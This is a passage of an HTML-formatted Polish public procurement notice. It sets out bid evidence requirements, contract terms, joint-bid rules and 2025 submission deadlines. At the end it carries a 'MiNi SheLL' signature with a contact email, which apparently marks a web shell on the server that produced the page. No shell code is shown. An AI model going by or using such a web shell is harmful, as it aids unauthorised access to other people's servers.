dowodowe – np. karty katalogowe lub inne dokumenty (jeśli w formie elektronicznej, np. link do strony internetowej – ogólnodostępne) potwierdzające, że oferowany asortyment odpowiada wymaganiom określonym przez Zamawiającego dotyczącym wydajności lub funkcjonalności asortymentu <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe – np. karty katalogowe lub inne dokumenty (jeśli w formie elektronicznej, np. link do strony internetowej – ogólnodostępne) potwierdzające, że oferowany asortyment odpowiada wymaganiom określonym przez Zamawiającego dotyczącym wydajności lub funkcjonalności asortymentu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie zgodnie z Załącznikiem do SWZ, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/10blog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com